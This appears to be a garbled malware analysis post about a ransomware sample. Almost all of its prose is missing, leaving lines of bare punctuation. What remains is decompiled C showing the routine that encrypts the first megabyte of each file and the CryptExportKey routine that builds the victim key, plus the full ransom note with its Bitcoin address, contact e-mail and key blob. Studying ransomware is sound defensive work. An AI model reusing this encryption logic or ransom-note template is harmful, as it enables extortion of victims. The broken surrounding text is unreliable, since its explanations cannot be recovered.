, . 10-12 .
, .
( 13-00 27- ), , , . .
5- .
.
→ h**ps://gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759 — .
→ h**ps://retdec.com/decompilation-run/ — .
— , windows , .
.
1. 1 (0x100000) . — 1- :
// 0x100018da
if (v6 <= lpFileMappingAttributes) {
if (lpFileSize <= 0x100000) { //
// 0x10001958
dwNumberOfBytesToMap = (struct _LARGE_INTEGER *)lpFileSize;
pdwDataLen = dwNumberOfBytesToMap;
dwMaximumSizeLow = 16 * (lpFileSize / 16 + 1);
// branch -> 0x100018eb
// 0x100018eb
hFileMappingObject = CreateFileMappingW((char *)hFile2, (struct _SECURITY_ATTRIBUTES *)lpFileMappingAttributes, 4, lpFileMappingAttributes, dwMaximumSizeLow, (int16_t *)lpFileMappingAttributes);
dwFileOffsetHigh = lpFileMappingAttributes;
if ((int32_t)hFileMappingObject != dwFileOffsetHigh) {
// 0x100018ff
pbData = MapViewOfFile(hFileMappingObject, 6, dwFileOffsetHigh, dwFileOffsetHigh, (int32_t)dwNumberOfBytesToMap);
v4 = (int32_t)pbData;
hFile2 = v4;
hHash = lpFileMappingAttributes;
if (v4 != hHash) {
// 0x10001913
hKey = *(int32_t *)(a2 + 20);
v5 = CryptEncrypt(hKey, hHash, (int32_t)(struct _SECURITY_ATTRIBUTES *)1 % 2 != 0, hHash, pbData, (int32_t *)&pdwDataLen, dwMaximumSizeLow);
if (v5) {
// 0x1000192e
FlushViewOfFile((char *)hFile2, (int32_t)pdwDataLen);
// branch -> 0x10001938
}
// 0x10001938
UnmapViewOfFile((char *)hFile2);
// branch -> 0x1000193f
}
// 0x1000193f
CloseHandle(hFileMappingObject);
// branch -> 0x10001948
}
// 0x10001948
handleClosed = CloseHandle(hFile);
// branch -> 0x10001951
// 0x10001951
g8 = v1;
g4 = v3;
return (char *)handleClosed;
}
}
// 0x100018e6
pdwDataLen = (struct _LARGE_INTEGER *)0x100000; // 1
struct _SECURITY_ATTRIBUTES * v8 = (struct _SECURITY_ATTRIBUTES *)lpFileMappingAttributes;
lpFileMappingAttributes2 = v8;
v7 = v8;
dwNumberOfBytesToMap2 = (struct _LARGE_INTEGER *)0x100000;
dwMaximumSizeLow = 0x100000;
// branch -> 0x100018eb
}
, .
2. . README.TXT , , ( ). .
Ooops, your important files are encrypted.
If you see this text, then your files are no longer accessible, because
they have been encrypted. Perhaps you are busy looking for a way to recover
your files, but don't waste your time. Nobody can recover your files without
our decryption service.
We guarantee that you can recover all your files safely and easily.
All you need to do is submit the payment and purchase the decryption key.
Please follow the instructions:
1. Send $300 worth of Bitcoin to following address:
1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX
2. Send your Bitcoin wallet ID and personal installation key to e-mail wowsmith123456@posteo.net.
Your personal installation key:
AQIAAA5mAAAApAAAuoxiZtYONU+IOA/XL0Yt/lsBOfNmT9WBDYQ8LsRCWJbQ3iTs
Ka1mVGVmMpJxO+bQmzmEwwiy1Mzsw2hVilFIK1kQoC8lEZPvV06HFGBeIaSAfrf6
6kxuvs7U/fDP6RUWt3hGT4KzUzjU7NhIYKg2crEXuJ9gmgIE6Rq1hSv6xpscqvvV
Fg4k0EHN3TS9hSOWbZXXsDe9H1r83M4LDHA+NJmVM7CKPCRFc82UIQNZY/CDz/db
1IknT/oiBDlDH8fHDr0Z215M3lEy/K7PC4NSk9c+oMP1rLm3ZeL0BbGTBPAZvTLI
LkKYVqRSYpN+Mp/rBn6w3+q15DNRlbGjm1i+ow==
.
void function_10001c7f(void) {
int32_t dwFlags = 0; // ebx
int32_t hKey = *(int32_t *)(g3 + 20); // 0x10001ca0
int32_t pdwDataLen = 0;
int32_t v1;
if (!CryptExportKey(hKey, *(int32_t *)(g3 + 12), 1, 0, NULL, &pdwDataLen)) {
// 0x10001d2a
g3 = (int32_t)NULL;
g4 = v1;
return;
}
char * memoryHandle = LocalAlloc(64, pdwDataLen); // 0x10001cb1
if ((int32_t)memoryHandle == dwFlags) {
// 0x10001d2a
g3 = (int32_t)NULL;
g4 = v1;
return;
}
int32_t hExpKey = *(int32_t *)(g3 + 12); // 0x10001cc6
int32_t hKey2 = *(int32_t *)(g3 + 20); // 0x10001cc9
if (CryptExportKey(hKey2, hExpKey, 1, dwFlags, memoryHandle, &pdwDataLen)) {
int32_t pcchString = dwFlags;
bool v2 = CryptBinaryToStringW(memoryHandle, pdwDataLen, 1, (int16_t *)dwFlags, &pcchString); // 0x10001ce8
if (v2) {
char * memoryHandle2 = LocalAlloc(64, 2 * pcchString); // 0x10001cf6
int32_t hMem = (int32_t)memoryHandle2; // 0x10001cf6_6
if (hMem == dwFlags) {
// 0x10001d21
LocalFree(memoryHandle);
// branch -> 0x10001d2a
// 0x10001d2a
g3 = (int32_t)NULL;
g4 = v1;
return;
}
CryptExportKey — 1, . README.TXT.
— , ? . , .
, , .
— , , , . 160-180 . , . 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX 10000$. , , , .
. .